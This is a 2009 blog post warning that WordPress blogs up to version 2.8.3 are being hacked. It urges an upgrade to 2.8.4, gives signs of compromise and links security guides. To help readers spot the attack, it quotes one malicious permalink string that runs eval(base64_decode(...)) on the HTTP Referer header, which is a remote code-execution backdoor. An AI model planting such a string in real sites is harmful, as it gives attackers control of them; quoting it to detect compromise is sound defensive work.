All WordPress blogs up to version 2.8.3 are reportedly being attacked and hacked.
The latest WordPress version 2.8.4 seems to be SAFE.
The blogs on WordPress.com are SAFE as the WordPress.com system is up-to-date.
Thank you so much for Lorelle on WP for making a post about this, so I got the news (check Lorelle's post for all the info).
Update to the Latest WordPress Version
Here's what you need to do if you have blog(s) that are not updated to the latest WordPress version:
- Before you continue reading,
- Go and update ALL YOUR WORDPRESS BLOGS to version 2.8.4.
- Really, stop reading, it IS that serious.
- Continue reading after you have UPGRADED your WordPress to the latest version.
Recognizing The Attack
Two clues have been recognized to spot if you've already been hacked (here's hoping you haven't been):
- new administrator
- the second clue is that a “back door” was created by a “hidden” Administrator.
- Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
- permalinks (Settings --> Permalinks):
- The keywords are “eval” and “base64_decode.”
example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.
Secure Your Blog
- WordPress Codex – FAQ – My Site Was Hacked
- WordPress Codex – Hardening WordPress (security protection)
- Weblog Tools Collection – Maximum WordPress Security
- Guvnr – 10 Tips to Make WordPress Hack Proof
- Daily Blog Tips – Make Sure Your WordPress is Not Hacked
- Noupe – WordPress Security Tips and Hacks
- 9 Best WordPress Security Plugins
- Top 5 WordPress Security Tips You Most Likely Don’t Follow
- WordPress Security Tip: Remove the Admin User
The News Updates
2009-09-04: News reported on the WordPress.org Support Forums: HACK WARNING: UPGRADE IMMEDIATELY:
if you don't upgrade, you will get hacked. It's not a matter of "if", it's a matter of "when". Don't wait to be hacked.
2009-09-05: WordPress development blog: How to Keep WordPress Secure
Spread the News!
We need to make sure everyone is informed about this. But stick to the facts, which at the moment is that:
- Old WordPress blogs up to 2.8.3 are reportedly being attacked
- WP version 2.8.4 seems to be safe
Re-Tweet to make sure EVERY WordPress blogger is aware of this.
And always, always keep your WordPress and plugins in your blog updated to the latest version!
Read all about this here: Old WordPress Versions Under Attack via Lorelle on WP
Original Warning / News on the WordPress.org Forum: HACK WARNING: UPGRADE IMMEDIATELY
